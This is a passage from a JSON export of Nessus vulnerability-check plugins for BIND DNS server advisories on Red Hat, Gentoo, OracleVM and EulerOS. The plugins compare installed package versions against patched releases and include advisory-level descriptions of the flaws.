value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0078\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-chroot-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-chroot-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bind-debuginfo-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"bind-debuginfo-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-debuginfo-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-debuginfo-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bind-devel-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"bind-devel-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-devel-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-devel-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bind-libs-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"bind-libs-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-libs-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-sdb-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-sdb-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-utils-9.8.2-0.17.rc1.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"bind-utils-9.8.2-0.23.rc1.el6_5.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:08:09", "description": "The remote host is affected by the vulnerability described in GLSA-201510-01 (BIND: Denial of Service)\n\n A vulnerability has been discovered in BIND’s named utility leading to a Denial of Service condition.\n Impact :\n\n A remote attacker may be able to cause Denial of Service condition via specially constructed zone data.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2015-10-19T00:00:00", "type": "nessus", "title": "GLSA-201510-01 : BIND: Denial of Service", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-5986"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:bind", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201510-01.NASL", "href": "https://www.tenable.com/plugins/nessus/86435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201510-01.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86435);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-5986\");\n script_xref(name:\"GLSA\", value:\"201510-01\");\n\n script_name(english:\"GLSA-201510-01 : BIND: Denial of Service\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201510-01\n(BIND: Denial of Service)\n\n A vulnerability has been discovered in BIND’s named utility leading to\n a Denial of Service condition.\n \nImpact :\n\n A remote attacker may be able to cause Denial of Service condition via\n specially constructed zone data.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201510-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All BIND users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-dns/bind-9.10.2_p4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-dns/bind\", unaffected:make_list(\"ge 9.10.2_p4\"), vulnerable:make_list(\"lt 9.10.2_p4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"BIND\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:57:36", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n\n - Fix (CVE-2016-1285, CVE-2016-1286)\n\n - Fix (CVE-2015-8704)\n\n - Fix (CVE-2015-8000)\n\n - Fix (CVE-2015-5722)\n\n - Fix (CVE-2015-5477)\n\n - Remove files backup after patching (Related: #1171971)\n\n - Fix CVE-2014-8500 (#1171971)\n\n - fix race condition in socket module\n\n - fix (CVE-2012-5166)\n\n - bind-chroot-admin: set correct permissions on /etc/named.conf during update\n\n - fix (CVE-2012-4244)\n\n - fix (CVE-2012-3817)\n\n - fix (CVE-2012-1667)\n\n - fix (CVE-2012-1033)", "cvss3": {"score": 8.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2016-06-22T00:00:00", "type": "nessus", "title": "OracleVM 3.2 : bind (OVMSA-2016-0055)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1033", "CVE-2012-1667", "CVE-2012-3817", "CVE-2012-4244", "CVE-2012-5166", "CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-libs", "p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.2"], "id": "ORACLEVM_OVMSA-2016-0055.NASL", "href": "https://www.tenable.com/plugins/nessus/91739", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0055.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91739);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1033\", \"CVE-2012-1667\", \"CVE-2012-3817\", \"CVE-2012-4244\", \"CVE-2012-5166\", \"CVE-2014-8500\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2015-8704\", \"CVE-2016-1285\", \"CVE-2016-1286\");\n script_bugtraq_id(51898, 53772, 54658, 55522, 55852, 71590);\n\n script_name(english:\"OracleVM 3.2 : bind (OVMSA-2016-0055)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix issue with patch for CVE-2016-1285 and CVE-2016-1286\n found by test suite\n\n - Fix (CVE-2016-1285, CVE-2016-1286)\n\n - Fix (CVE-2015-8704)\n\n - Fix (CVE-2015-8000)\n\n - Fix (CVE-2015-5722)\n\n - Fix (CVE-2015-5477)\n\n - Remove files backup after patching (Related: #1171971)\n\n - Fix CVE-2014-8500 (#1171971)\n\n - fix race condition in socket module\n\n - fix (CVE-2012-5166)\n\n - bind-chroot-admin: set correct permissions on\n /etc/named.conf during update\n\n - fix (CVE-2012-4244)\n\n - fix (CVE-2012-3817)\n\n - fix (CVE-2012-1667)\n\n - fix (CVE-2012-1033)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2016-June/000477.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"bind-libs-9.3.6-25.P1.el5_11.8\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"bind-utils-9.3.6-25.P1.el5_11.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2021-12-23T02:33:33", "description": "According to the versions of the bind packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.(CVE-2016-2776)\n\n - A denial of service flaw was found in the way BIND processed certain control channel input. A remote attacker able to send a malformed packet to the control channel could use this flaw to cause named to crash.(CVE-2016-1285)\n\n - A flaw was found in the way BIND performed DNSSEC validation. An attacker able to make BIND (functioning as a DNS resolver with DNSSEC validation enabled) resolve a name in an attacker-controlled domain could cause named to exit unexpectedly with an assertion failure.(CVE-2015-4620)\n\n - A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet.(CVE-2015-5477)\n\n - A denial of service flaw was found in the way BIND handled queries for NSEC3-signed zones. A remote attacker could use this flaw against an authoritative name server that served NCES3-signed zones by sending a specially crafted query, which, when processed, would cause named to crash.(CVE-2014-0591)\n\n - A denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. A remote attacker could use this flaw to send a specially crafted DNS query (for example, a query requiring a response from a zone containing a deliberately malformed key) that would cause named functioning as a validating resolver to crash.(CVE-2015-5722)\n\n - It was found that the lightweight resolver protocol implementation in BIND could enter an infinite recursion and crash when asked to resolve a query name which, when combined with a search list entry, exceeds the maximum allowable length. A remote attacker could use this flaw to crash lwresd or named when using the 'lwres' statement in named.conf.(CVE-2016-2775)\n\n - A denial of service flaw was found in the way BIND processed certain records with malformed class attributes. A remote attacker could use this flaw to send a query to request a cached record with a malformed class attribute that would cause named functioning as an authoritative or recursive server to crash. Note: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers listed in NS RRSETs.(CVE-2015-8000)\n\n - A denial of service flaw was found in the way BIND handled responses containing a DNAME answer. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.(CVE-2016-8864)\n\n - A denial of service flaw was found in the way BIND processed a response to an ANY query. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.(CVE-2016-9131)\n\n - A denial of service flaw was found in the way BIND followed DNS delegations. A remote attacker could use a specially crafted zone containing a large number of referrals which, when looked up and processed, would cause named to use excessive amounts of memory or crash.(CVE-2014-8500)\n\n - A flaw was found in the way BIND handled trust anchor management. A remote attacker could use this flaw to cause the BIND daemon (named) to crash under certain conditions.(CVE-2015-1349)\n\n - A denial of service flaw was found in the way BIND parsed signature records for DNAME records. By sending a specially crafted query, a remote attacker could use this flaw to cause named to crash.(CVE-2016-1286)\n\n - A use-after-free flaw leading to denial of service was found in the way BIND internally handled cleanup operations on upstream recursion fetch contexts. A remote attacker could potentially use this flaw to make named, acting as a DNSSEC validating resolver, exit unexpectedly with an assertion failure via a specially crafted DNS request.(CVE-2017-3145)\n\n - A denial of service flaw was found in the way BIND handled query requests when using DNS64 with 'break-dnssec yes' option. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request.(CVE-2017-3136)\n\n - A flaw was found in the way BIND handled TSIG authentication of AXFR requests. A remote attacker, able to communicate with an authoritative BIND server, could use this flaw to view the entire contents of a zone by sending a specially constructed request packet.(CVE-2017-3142)\n\n - A flaw was found in the way BIND handled TSIG authentication for dynamic updates. A remote attacker able to communicate with an authoritative BIND server could use this flaw to manipulate the contents of a zone, by forging a valid TSIG or SIG(0) signature for a dynamic update request.(CVE-2017-3143)\n\n - A denial of service flaw was discovered in bind versions that include the 'deny-answer-aliases' feature. This flaw may allow a remote attacker to trigger an INSIST assert in named leading to termination of the process and a denial of service condition.(CVE-2018-5740)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : bind (EulerOS-SA-2019-1433)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0591", "CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2775", "CVE-2016-2776", "CVE-2016-8864", "CVE-2016-9131", "CVE-2017-3136", "CVE-2017-3142", "CVE-2017-3143", "CVE-2017-3145", "CVE-2018-5740"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:bind-libs", "p-cpe:/a:huawei:euleros:bind-libs-lite", "p-cpe:/a:huawei:euleros:bind-license", "p-cpe:/a:huawei:euleros:bind-utils", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1433.NASL", "href": "https://www.tenable.com/plugins/nessus/124936", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124936);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-0591\",\n \"CVE-2014-8500\",\n \"CVE-2015-1349\",\n \"CVE-2015-4620\",\n \"CVE-2015-5477\",\n \"CVE-2015-5722\",\n \"CVE-2015-8000\",\n \"CVE-2016-1285\",\n \"CVE-2016-1286\",\n \"CVE-2016-2775\",\n \"CVE-2016-2776\",\n \"CVE-2016-8864\",\n \"CVE-2016-9131\",\n \"CVE-2017-3136\",\n \"CVE-2017-3142\",\n \"CVE-2017-3143\",\n \"CVE-2017-3145\",\n \"CVE-2018-5740\"\n );\n script_bugtraq_id(\n 64801,\n 71590,\n 72673,\n 75588\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : bind (EulerOS-SA-2019-1433)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the bind packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A denial of service flaw was found in the way BIND\n constructed a response to a query that met certain\n criteria. A remote attacker could use this flaw to make\n named exit unexpectedly with an assertion failure via a\n specially crafted DNS request packet.(CVE-2016-2776)\n\n - A denial of service flaw was found in the way BIND\n processed certain control channel input. A remote\n attacker able to send a malformed packet to the control\n channel could use this flaw to cause named to\n crash.(CVE-2016-1285)\n\n - A flaw was found in the way BIND performed DNSSEC\n validation. An attacker able to make BIND (functioning\n as a DNS resolver with DNSSEC validation enabled)\n resolve a name in an attacker-controlled domain could\n cause named to exit unexpectedly with an assertion\n failure.(CVE-2015-4620)\n\n - A flaw was found in the way BIND handled requests for\n TKEY DNS resource records. A remote attacker could use\n this flaw to make named (functioning as an\n authoritative DNS server or a DNS resolver) exit\n unexpectedly with an assertion failure via a specially\n crafted DNS request packet.(CVE-2015-5477)\n\n - A denial of service flaw was found in the way BIND\n handled queries for NSEC3-signed zones. A remote\n attacker could use this flaw against an authoritative\n name server that served NCES3-signed zones by sending a\n specially crafted query, which, when processed, would\n cause named to crash.(CVE-2014-0591)\n\n - A denial of service flaw was found in the way BIND\n parsed certain malformed DNSSEC keys. A remote attacker\n could use this flaw to send a specially crafted DNS\n query (for example, a query requiring a response from a\n zone containing a deliberately malformed key) that\n would cause named functioning as a validating resolver\n to crash.(CVE-2015-5722)\n\n - It was found that the lightweight resolver protocol\n implementation in BIND could enter an infinite\n recursion and crash when asked to resolve a query name\n which, when combined with a search list entry, exceeds\n the maximum allowable length. A remote attacker could\n use this flaw to crash lwresd or named when using the\n 'lwres' statement in named.conf.(CVE-2016-2775)\n\n - A denial of service flaw was found in the way BIND\n processed certain records with malformed class\n attributes. A remote attacker could use this flaw to\n send a query to request a cached record with a\n malformed class attribute that would cause named\n functioning as an authoritative or recursive server to\n crash. Note: This issue affects authoritative servers\n as well as recursive servers, however authoritative\n servers are at limited risk if they perform\n authentication when making recursive queries to resolve\n addresses for servers listed in NS\n RRSETs.(CVE-2015-8000)\n\n - A denial of service flaw was found in the way BIND\n handled responses containing a DNAME answer. A remote\n attacker could use this flaw to make named exit\n unexpectedly with an assertion failure via a specially\n crafted DNS response.(CVE-2016-8864)\n\n - A denial of service flaw was found in the way BIND\n processed a response to an ANY query. A remote attacker\n could use this flaw to make named exit unexpectedly\n with an assertion failure via a specially crafted DNS\n response.(CVE-2016-9131)\n\n - A denial of service flaw was found in the way BIND\n followed DNS delegations. A remote attacker could use a\n specially crafted zone containing a large number of\n referrals which, when looked up and processed, would\n cause named to use excessive amounts of memory or\n crash.(CVE-2014-8500)\n\n - A flaw was found in the way BIND handled trust anchor\n management. A remote attacker could use this flaw to\n cause the BIND daemon (named) to crash under certain\n conditions.(CVE-2015-1349)\n\n - A denial of service flaw was found in the way BIND\n parsed signature records for DNAME records. By sending\n a specially crafted query, a remote attacker could use\n this flaw to cause named to crash.(CVE-2016-1286)\n\n - A use-after-free flaw leading to denial of service was\n found in the way BIND internally handled cleanup\n operations on upstream recursion fetch contexts. A\n remote attacker could potentially use this flaw to make\n named, acting as a DNSSEC validating resolver, exit\n unexpectedly with an assertion failure via a specially\n crafted DNS request.(CVE-2017-3145)\n\n - A denial of service flaw was found in the way BIND\n handled query requests when using DNS64 with\n 'break-dnssec yes' option. A remote attacker could use\n this flaw to make named exit unexpectedly with an\n assertion failure via a specially crafted DNS\n request.(CVE-2017-3136)\n\n - A flaw was found in the way BIND handled TSIG\n authentication of AXFR requests. A remote attacker,\n able to communicate with an authoritative BIND server,\n could use this flaw to view the entire contents of a\n zone by sending a specially constructed request\n packet.(CVE-2017-3142)\n\n - A flaw was found in the way BIND handled TSIG\n authentication for dynamic updates. A remote attacker\n able to communicate with an authoritative BIND server\n could use this flaw to manipulate the contents of a\n zone, by forging a valid TSIG or SIG(0) signature for a\n dynamic update request.(CVE-2017-3143)\n\n - A denial of service flaw was discovered in bind\n versions that include the 'deny-answer-aliases'\n feature. This flaw may allow a remote attacker to\n trigger an INSIST assert in named leading to\n termination of the process and a denial of service\n condition.(CVE-2018-5740)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional 